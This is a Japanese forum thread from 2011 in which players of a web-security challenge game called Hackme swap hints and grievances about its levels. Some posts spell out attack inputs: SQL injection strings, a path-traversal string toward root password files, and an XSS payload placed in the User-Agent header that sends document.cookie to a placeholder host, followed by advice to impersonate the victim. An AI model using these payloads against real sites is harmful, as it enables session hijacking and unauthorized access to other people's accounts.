563 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:24:29.06
>562
お、いい感じ 64bitもポイント
お、いい感じ 64bitもポイント
564 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:25:49.53
なんでも鵜呑みにするのは危険
IDでないしw
IDでないしw
565 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:27:02.52
>>563
俺は gzip が重要だと思う。
俺は gzip が重要だと思う。
566 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:27:47.20
Lv2がどうしてもわからん
括弧でくくってあることを考えて') Or ('a'='aとか
定数が先でフィールドが後になっているのかと思ってa'='a' Or 'とかやっても駄目だし
このありえないエラー表示から何を読み取ればいいのよ
括弧でくくってあることを考えて') Or ('a'='aとか
定数が先でフィールドが後になっているのかと思ってa'='a' Or 'とかやっても駄目だし
このありえないエラー表示から何を読み取ればいいのよ
567 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:28:32.27
>>566
全部エスケープされるじゃんそれ
全部エスケープされるじゃんそれ
568 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:29:00.05
じゃ俺はTrident/4.0。
てかyoutube見てたらいっぱいhackのやり方のせてる奴らいるから見てみればいい。
xss hackとか。がんばれー
てかyoutube見てたらいっぱいhackのやり方のせてる奴らいるから見てみればいい。
xss hackとか。がんばれー
569 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:30:46.94
>>566
Lv2 インジェクションじゃないよ
Lv2 インジェクションじゃないよ
570 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:30:55.37
571 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:31:13.43
>>567
ええと・・・エスケープされたらSQLエラーにはならないんじゃ・・・
ええと・・・エスケープされたらSQLエラーにはならないんじゃ・・・
572 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:31:19.40
とっとと Lv4 をクリアして、Lv5 包囲網を作ってほしい。
573 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:32:10.22
Lv4のヒントください
574 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:04.15
>>573
XSS
XSS
575 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:11.97
おれはLv5のキッカケが知りたい
576 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:20.19
577 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:20.23
gzip(gfe),gzip(gfe),・・・
ヘルプ
ヘルプ
578 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:26.84
>>568
英語分りません><
英語分りません><
579 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:41.99
>>574
どんなスクリプトかおしえてください
どんなスクリプトかおしえてください
580 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:34:17.35
581 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:35:38.35
582 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:36:00.55
lv4クリアしたひとの中で誰か
lv5いけるようにした捨てアカウント
さらしてくれませんか?
lv5いけるようにした捨てアカウント
さらしてくれませんか?
583 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:36:02.26
このプロモーションは有効だな
セキュリティなんてどんだけ口うまいやつが風呂敷広げるかだからな
セキュリティなんてどんだけ口うまいやつが風呂敷広げるかだからな
584 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:36:27.22
つーか、9万人以上参加してんのに、Lv5 クリアした奴が一人も居ないとかどうなってんの!?
585 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:37:11.57
586 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:38:04.49
ここだけの話、lv4をクリアしたひとはいない
理由はlv2の時、lv3の話をした内容を思い出せばわかるよ
ヒント:そいつらは全員lv3はxssだと言っていたw
理由はlv2の時、lv3の話をした内容を思い出せばわかるよ
ヒント:そいつらは全員lv3はxssだと言っていたw
587 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:39:33.14
>>586
Σ(・ε・;) タシカニ…
Σ(・ε・;) タシカニ…
588 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:40:53.98
>>586
Lv3を見てxssというヤツは素人では
Lv3を見てxssというヤツは素人では
589 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:41:07.03
でもLv4クリアした人は増えてるから正解も混ざってる
590 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:41:43.64
LV4 をクリアするよりも LV4 をクリアしたやつらのアカウントを奪う方が簡単だったりしてなw
591 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:42:04.80
LV4できた ちょっと笑ったわ
592 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:42:34.41
>>590
はは、やってみろ
はは、やってみろ
593 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:42:45.85
>>590
多分簡単だが、やったら不正アクセスで手が後ろに回るわw
多分簡単だが、やったら不正アクセスで手が後ろに回るわw
594 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:42:59.65
document.write('sessionid教えてください');
でいけたわ
でいけたわ
595 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:43:09.76
****さんの称号は、「ハッカー」です。なかなか。
やりますね。でも、もしセキュリティ関係者だったらこの位は普通でしょ?
続きから再開する
やりますね。でも、もしセキュリティ関係者だったらこの位は普通でしょ?
続きから再開する
596 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:43:54.25
そのうちに会社で遊んでるのがバレちゃうかも
フィルタ対象になってしまうかも..
フィルタ対象になってしまうかも..
597 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:45:11.63
598 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:46:00.75
検索能力もハッキングの一つか...
599 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:46:05.75
600 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:46:29.82
>>591
なんで笑ったの?
なんで笑ったの?
601 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:46:50.19
というかLv5ってあるの?
602 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:47:26.44
にょきって出てくるアレならちょっと笑った
603 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:48:23.65
604 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:51:28.24
そうかXSRFか
605 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:52:28.85
もしかしてga.jsからクッキー(ry
606 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:55:09.29
>>582
つ _try_lv5_
つ _try_lv5_
607 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:55:20.32
LV5の手掛かりのなさは異常
というかLV4までの露骨な手掛かりが異常だった
というかLV4までの露骨な手掛かりが異常だった
608 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:55:40.84
ちょっと見ない間にたまごたちが増えてるけど
ネタバレ中なの?
Lv3までならセキュリティ関連の情報を検索すれば自力でできるぜ
Lv4はちょっと無理すじ
ネタバレ中なの?
Lv3までならセキュリティ関連の情報を検索すれば自力でできるぜ
Lv4はちょっと無理すじ
609 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:55:49.16
610 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:56:11.90
>>607
確かに!
確かに!
611 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:57:23.88
>>599
ごめんなさい、gzip はジョークです。
ごめんなさい、gzip はジョークです。
612 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:57:52.22
>>599
俺もgzipが怪しいと思ってるが、どうも進まない
俺もgzipが怪しいと思ってるが、どうも進まない
613 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:58:21.08
UAにクッキー詰めてログインに飛ばしても駄目なのか
もうどうしろと
もうどうしろと
614 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:58:25.21
615 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:58:33.24
>>607
確かにww レベルが進むごとに、なんか変なの追加されてんぞ状態。
確かにww レベルが進むごとに、なんか変なの追加されてんぞ状態。
616 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:59:08.75
Lv5 解ける気がしない
もう少しゲームとして楽しめるようにしてほしい
もう少しゲームとして楽しめるようにしてほしい
617 :名無しさん@お腹いっぱい。:2011/02/25(金) 00:59:23.35
Lv4を説いたっていう人沢山いるけど
21時頃からランキングに一人も追加されてないのはなんで?
21時頃からランキングに一人も追加されてないのはなんで?
618 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:00:02.68
login.htmになんかスクリプト投げればいいのか?
619 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:00:44.93
620 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:00:56.19
>>617
昼頃は中の人合わせて6人なのに今は・・・
昼頃は中の人合わせて6人なのに今は・・・
621 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:01:25.66
>>617
かなり増えてるよ。今45人くらい。
かなり増えてるよ。今45人くらい。
622 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:02:16.89
そうかjsessionidか、なるほど
623 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:02:47.10
フラクタルはじまっちゃったお
フラクタルの中にLv4の答えあるかな?
フラクタルの中にLv4の答えあるかな?
624 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:03:22.77
夜になると帰宅する奴もいるだろう
今の50人ほどは素直に解いたものだと思う
今の50人ほどは素直に解いたものだと思う
625 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:04:24.31
>>566だがようやくLv2通ったわ。ヒントくれた人たちありがとう。
だがしかし定数「1」がTrueと見なされないのは正直頭おかしいと思う。
だがしかし定数「1」がTrueと見なされないのは正直頭おかしいと思う。
626 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:05:54.98
lv4の新しいヒントをくれ
ua,xss,scriptとかそう言うのはもうヒント貰う前に通り過ぎてそっからがわからん
ua,xss,scriptとかそう言うのはもうヒント貰う前に通り過ぎてそっからがわからん
627 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:07:15.36
あきらメロン。どうせLv3もネタバレで解いたクチでしょう
628 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:07:17.69
>>626
意味不明
意味不明
629 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:07:19.69
gzipはGAE使ってるとなぜかUAにくっつくんだよ
理由は全くわからん
理由は全くわからん
630 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:08:35.64
631 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:08:40.90
gzip使ってるからだよ
632 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:10:31.53
633 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:11:07.97
634 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:12:07.58
>>617
誰もクリアしてないから以外にあんの?
誰もクリアしてないから以外にあんの?
635 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:13:15.45
Lv1から進めないんですけど、どうすればいいのでしょうか?
>>635
あきらめろ
あきらめろ
637 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:14:55.05
>>635
読売オンラインの記事をコピペするところから始めるべき
読売オンラインの記事をコピペするところから始めるべき
638 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:15:03.18
それはSQLの仕様じゃないか
639 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:15:15.39
誰でもクリアできるもんではないよ。
Lv4はヒント貰っても元々それなりに知識ある人じゃないとクリアできん。
スレ内で9割方ネタバレされてるけどクリア者あまり増えてないだろ?
Lv4はヒント貰っても元々それなりに知識ある人じゃないとクリアできん。
スレ内で9割方ネタバレされてるけどクリア者あまり増えてないだろ?
640 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:15:23.51
lv4は以前のlv2と同じような感じらしいので修正くるまで待ち
一字一句揃えて云々とかアホらしすぎる
一字一句揃えて云々とかアホらしすぎる
まぁ、確かに そうかもしれん
642 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:15:46.28
>>636
そ、そうですが...
そ、そうですが...
643 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:17:38.81
lv5がわからねーというかほとんどみんなやってないんだろうなlv4ぐらいで愛想つかして
644 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:17:56.37
>>606
この垢ランキングに載ってるんだけどパスは?
この垢ランキングに載ってるんだけどパスは?
Lv1とか、ソースコード見れれば簡単だろ。
つーか、中学生すらLv3クリアしてるのに大人ができないとかw
つーか、中学生すらLv3クリアしてるのに大人ができないとかw
646 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:19:40.61
647 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:19:42.29
たぶん多くの人が試してるスクリプトは弾くようなコーディングをしてる奴が
スクリプトの埋め込みを許すようなことなんてそもそもあり得ないだろ
ググるだけで簡単にできるようなのはらめぇ って意図なんだろうか
スクリプトの埋め込みを許すようなことなんてそもそもあり得ないだろ
ググるだけで簡単にできるようなのはらめぇ って意図なんだろうか
648 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:19:46.75
セキュ板に居て、こんなスレ見てるのにLv1解けないのはどうしょうもないよなw
649 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:20:26.38
650 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:20:41.33
年齢は関係ないだろ、なにもしないのはバカだとはおもうが
651 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:21:25.71
そういやアノサイトまだあるのかな?
クリックやらソースやらTABやら反転やら駆使してどんどんページを進んでいく凄く古くにあったサイト
クリックやらソースやらTABやら反転やら駆使してどんどんページを進んでいく凄く古くにあったサイト
652 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:21:29.59
やっぱみんなLv4で詰まってんのな
スクリプト書いても弾かれるだけだしなぁ・・
スクリプト書いても弾かれるだけだしなぁ・・
653 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:21:44.28
一字一句は微妙に違う気がするけどまぁ酷いのは確か
1LVの答え Yahooの知恵袋で晒されてたよな。
今は使えるか知らんけど
今は使えるか知らんけど
655 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:22:14.80
656 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:22:30.55
闇プログラマの中学生がいると聞いて
657 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:22:57.99
658 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:23:04.50
あ、なんとなくわかったかも
659 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:23:18.47
仮に自鯖があるとおもって書いてみろ
661 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:24:24.61
../../etc/security/passwd/tcb/auth/files/r/root
これくらいにしとけばきっとLv3の価値がもっとですね
これくらいにしとけばきっとLv3の価値がもっとですね
662 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:24:30.44
ソース見るのは2000年ちょいくらいの時期には既にあったからなぁ
663 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:24:41.89
年齢自慢したいならRubyのコミッタになるぐらいしないと
こんなのは所詮ゲームの域を出ないよ
こんなのは所詮ゲームの域を出ないよ
664 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:25:53.48
このスレにいるやつら口は悪かいも知れないがイイヤツだな
アクセスしていていい感じだ
アクセスしていていい感じだ
665 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:26:09.35
>>663
その話題でるとおもったよw
その話題でるとおもったよw
666 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:27:03.19
とりあえずハム速から来た奴は死んでくれよ
667 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:27:20.55
年は自慢したくねーーーー
そろそろ介護保険...
そろそろ介護保険...
668 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:27:34.44
>>648
悪いが、どうしようもないと思うwww
悪いが、どうしようもないと思うwww
669 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:28:46.97
670 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:28:59.86
>>666
すまんハム速でHackmeのこと知ったわ。Lv4クリアしてるから勘弁してくれ。
すまんハム速でHackmeのこと知ったわ。Lv4クリアしてるから勘弁してくれ。
671 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:29:12.63
あっ、Lv4解けた
技術的というより、作者の考えに近づけるのに時間がかかったよ
技術的というより、作者の考えに近づけるのに時間がかかったよ
672 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:29:15.69
673 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:30:10.04
でも,LV1はある意味ノーヒントだから難しく考えて詰まる奴は多いと思う
Webアプリケーションセキュリティに詳しくない奴ほど早そう
Webアプリケーションセキュリティに詳しくない奴ほど早そう
674 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:30:13.01
hirarin0110さん乙
675 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:30:45.17
>>659
これを信じて突き進めばLv4はクリアできる。
これを信じて突き進めばLv4はクリアできる。
676 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:30:56.89
>>669
x86のアセンブリわかって何が嬉しい、じいさん? はぁ
x86のアセンブリわかって何が嬉しい、じいさん? はぁ
677 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:32:09.16
なんか急に伸びだしてるな
何で?
何で?
678 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:32:16.64
いいからはやくLv5解けよ
680 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:33:01.36
681 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:33:09.65
Lv4クリア済みの奴で協力してLv5攻略すべき
682 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:33:19.77
>>675
そういう自演はいらないです
そういう自演はいらないです
683 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:33:48.79
>>675
嘘を付くのはよくないぞ
嘘を付くのはよくないぞ
684 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:35:16.43
中学生君よりスキル低いと思うけど、
あんまり中学生って事をアピールしない方が良いよ。
なんでって、年取ってから思い出すと恥ずかしかったりする。
まあそれだけだな。
あんまり中学生って事をアピールしない方が良いよ。
なんでって、年取ってから思い出すと恥ずかしかったりする。
まあそれだけだな。
685 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:35:16.30
,. -‐'''''""¨¨¨ヽ
(.___,,,... -ァァフ| あ…ありのまま 今 起こった事を話すぜ!
|i i| }! }} //|
|l、{ j} /,,ィ//| 『アクセスログを見ようとワクテカしてたら
i|:!ヾ、_ノ/ u {:}//ヘ ブラウザが動き出したた』
|リ u' } ,ノ _,!V,ハ |
/´fト、_{ル{,ィ'eラ , タ人 な… 何を言ってるのか わからねーと思うが
/' ヾ|宀| {´,)⌒`/ |<ヽトiゝ おれも何をされたのかわからなかった
,゙ / )ヽ iLレ u' | | ヾlトハ〉
|/_/ ハ !ニ⊇ '/:} V:::::ヽ 頭がどうにかなりそうだった…
// 二二二7'T'' /u' __ /:::::::/`ヽ
/'´r -―一ァ‐゙T´ '"´ /::::/-‐ \ sessionidとかCSRFだとか
/ // 广¨´ /' /:::::/´ ̄`ヽ ⌒ヽ そんなチャチなもんじゃあ 断じてねえ
ノ ' / ノ:::::`ー-、___/:::::// ヽ }
_/`丶 /:::::::::::::::::::::::::: ̄`ー-{:::... イ もっと恐ろしいものの片鱗を味わったぜ…
(.___,,,... -ァァフ| あ…ありのまま 今 起こった事を話すぜ!
|i i| }! }} //|
|l、{ j} /,,ィ//| 『アクセスログを見ようとワクテカしてたら
i|:!ヾ、_ノ/ u {:}//ヘ ブラウザが動き出したた』
|リ u' } ,ノ _,!V,ハ |
/´fト、_{ル{,ィ'eラ , タ人 な… 何を言ってるのか わからねーと思うが
/' ヾ|宀| {´,)⌒`/ |<ヽトiゝ おれも何をされたのかわからなかった
,゙ / )ヽ iLレ u' | | ヾlトハ〉
|/_/ ハ !ニ⊇ '/:} V:::::ヽ 頭がどうにかなりそうだった…
// 二二二7'T'' /u' __ /:::::::/`ヽ
/'´r -―一ァ‐゙T´ '"´ /::::/-‐ \ sessionidとかCSRFだとか
/ // 广¨´ /' /:::::/´ ̄`ヽ ⌒ヽ そんなチャチなもんじゃあ 断じてねえ
ノ ' / ノ:::::`ー-、___/:::::// ヽ }
_/`丶 /:::::::::::::::::::::::::: ̄`ー-{:::... イ もっと恐ろしいものの片鱗を味わったぜ…
686 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:35:19.19
>>672
LV4そんなことなくない?よくある例は通らない印象
LV4そんなことなくない?よくある例は通らない印象
687 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:37:18.70
よくある例は通らなかったけど自分がいつも使う方法に変えたら通った
688 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:37:36.15
lv4は自分がしたいことを至極簡潔に書けば問題ないけど
689 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:37:39.01
690 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:38:46.89
先生!
ずばりLV4はdocument.cookieの文字は含めますか!?
ずばりLV4はdocument.cookieの文字は含めますか!?
691 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:39:23.35
692 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:39:42.31
ところでランキングの名前表示順てどうなってるんだろうなこれ
明らかにクリア日時じゃないけどアルファベットでもないし
かといってランダムでもないし
アカウントID順だろうか
明らかにクリア日時じゃないけどアルファベットでもないし
かといってランダムでもないし
アカウントID順だろうか
693 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:39:50.23
リアル厨二病が居てわろた。
いつか大人になってわかると思うから何も言うまい。
いつか大人になってわかると思うから何も言うまい。
694 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:40:25.05
>>690
いい線行っているとだけ答えておこう。
いい線行っているとだけ答えておこう。
695 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:41:14.03
Don't think、feeeeeeeeeeeeeeeeeel!
696 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:41:26.65
>>692
確かに、変な並び順だよなww
確かに、変な並び順だよなww
697 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:41:35.19
ふぅ・・・
698 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:42:07.42
IDに通し番号でも振ってあるんでしょ
699 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:42:36.29
アカウント作成順(id順)だろ
700 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:43:02.04
>>693
貴方も私の仲間ですか?
貴方も私の仲間ですか?
701 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:43:16.77
hackmeなんてもの夜中にやるもんじゃなくて
昼間にやるもんだぜ、それぐらいの余裕が無いとな
昼間にやるもんだぜ、それぐらいの余裕が無いとな
702 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:45:23.52
fuck me
703 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:45:42.32
>>606 使えたんだけど、Lv5意味不明すぎる。
704 :名無しさん@お腹いっぱい。:2011/02/25(金) 01:59:08.32
Lv4 ってブラウザ依存してたりする?
Safari でやってんだけど、どうもスクリプトが実行されないんだよな。
Safari でやってんだけど、どうもスクリプトが実行されないんだよな。
705 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:01:10.89
lv5やってみたが所見穴なしだった。
俺は新世界のログインページをひと目みれて満足した。
あとはお前達に託した。
俺は新世界のログインページをひと目みれて満足した。
あとはお前達に託した。
706 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:08:50.65
>>704
たぶん攻撃手法自体について何か勘違いをしている
たぶん攻撃手法自体について何か勘違いをしている
707 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:11:21.91
708 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:11:46.06
あーもうやめた
lv4は10種以上、別鯖いらずの成功するパターン試したのに駄目とかやってらんね
こんなあほらしいセキュリティの為のパース処理とかねぇよ
lv4は10種以上、別鯖いらずの成功するパターン試したのに駄目とかやってらんね
こんなあほらしいセキュリティの為のパース処理とかねぇよ
709 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:12:04.67
710 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:13:19.04
鯖は「いるけどいらない」
711 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:13:39.15
712 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:17:12.10
別鯖に送る方法何種かやったけど
別鯖の方しか見てなかったがもしかして見逃してるのか・・
別鯖の方しか見てなかったがもしかして見逃してるのか・・
713 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:17:42.26
いつもの惑わし
714 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:17:47.11
つーか、こんだけヒント出てんのに解けないとかどういう事。
XSSって言葉の意味すら知らんのかね。
XSSって言葉の意味すら知らんのかね。
715 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:18:52.49
>>708
俺も同じ意見だ。なんかアホらしくなってきた。
「スクリプトが実行可能なようです」で他のalert通らないとか
なんかやらされてる感ぷんぷんで萎える。
まあ、それでも色々試してみたんですけどね。
作者の意図を理解しなきゃ次に進めないとかパズルゲーム以下で面白くないわ
俺も同じ意見だ。なんかアホらしくなってきた。
「スクリプトが実行可能なようです」で他のalert通らないとか
なんかやらされてる感ぷんぷんで萎える。
まあ、それでも色々試してみたんですけどね。
作者の意図を理解しなきゃ次に進めないとかパズルゲーム以下で面白くないわ
716 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:19:13.74
>>710
これは良いヒントwww
これは良いヒントwww
717 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:20:38.94
718 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:21:06.12
example.comでいいとかそういうオチじゃねえよな?
719 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:21:38.78
720 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:21:59.95
こういうのはセキュ板に居る奴だけでひっそりやるのが楽しいのに
ブログとかから無知なカスが沸いてくるのがマジうぜぇわ
ブログとかから無知なカスが沸いてくるのがマジうぜぇわ
721 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:26:39.76
教科書通りにやるなら、UAに
<script>document.location="htpp://xxx.xxx/?cookie="+document.cookie</script>
を書いて終了なはず。
<script>document.location="htpp://xxx.xxx/?cookie="+document.cookie</script>
を書いて終了なはず。
722 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:27:05.13
教科書?どこが教科書通りなんだよ
脆弱性はxss
スクリプトが通ると言う前提で行われてるテストだろ
なのに1種しか通らないとかアホらしくて物がいえん
googleの懸賞のほうがまだマシだわ
脆弱性はxss
スクリプトが通ると言う前提で行われてるテストだろ
なのに1種しか通らないとかアホらしくて物がいえん
googleの懸賞のほうがまだマシだわ
723 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:29:27.92
Lv5の手がかり掴めた人いる?
724 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:30:27.82
725 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:30:45.58
正解したらどこに表示が出るのかだけでも知りたい
理論上は仕込んでからしばらく時間を置かないと見えないはずだけど
即反映されてログイン直後の画面に出てくるの?
理論上は仕込んでからしばらく時間を置かないと見えないはずだけど
即反映されてログイン直後の画面に出てくるの?
726 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:31:27.95
>>721
合ってるよ。あとは成りすましをすれば良い。
合ってるよ。あとは成りすましをすれば良い。
727 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:32:00.96
728 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:33:42.25
>>725
遷移後の画面(履歴が5件表示される画面)にすぐ反映される。
遷移後の画面(履歴が5件表示される画面)にすぐ反映される。
729 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:34:53.79
730 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:35:22.21
731 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:35:47.51
なんかもうLV4もほぼネタバレ祭り状態だな
こんなんじゃ週末にはLV4クリア200人超えとかするんじゃないか
こんなんじゃ週末にはLV4クリア200人超えとかするんじゃないか
732 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:36:27.61
もーちょいLv4のヒントくれ、頼むわ
理不尽さを少しは補完してくれ
理不尽さを少しは補完してくれ
733 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:36:43.73
>>730
頑張れ。正解したら「えぇぇぇww」ってなると思う。
頑張れ。正解したら「えぇぇぇww」ってなると思う。
734 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:36:46.94
コード貼っちゃう人とかちょっと大人気ないんじゃないかなー
735 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:37:36.78
課程には理不尽さはないはず。結果の出方が面白いだけで
736 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:37:45.36
>>732
正直、ヒントはこのスレで出尽くしているんで、これ以上は無理だわ。
正直、ヒントはこのスレで出尽くしているんで、これ以上は無理だわ。
737 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:37:56.70
なんかlv4の正解見たらキレるんじゃないかって気がしてきたわ・・・
738 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:39:34.19
>>721
なにこれネタバレ?
なにこれネタバレ?
739 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:39:46.32
>>731
俺的には1000人越えくらいして、総力戦でレベル5に挑みたいわ。
俺的には1000人越えくらいして、総力戦でレベル5に挑みたいわ。
740 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:41:09.47
741 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:41:12.16
Lv4クリアochinkoより
Javascriptビジュアル・リファレンス改訂版P228に答えが載ってる
Javascriptビジュアル・リファレンス改訂版P228に答えが載ってる
742 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:41:31.90
やりかたは絶対あってるはずなんだよ。
だけど正解が見つからないだけなんだよ。
だから誰かもう答え教えてくれ。
だけど正解が見つからないだけなんだよ。
だから誰かもう答え教えてくれ。
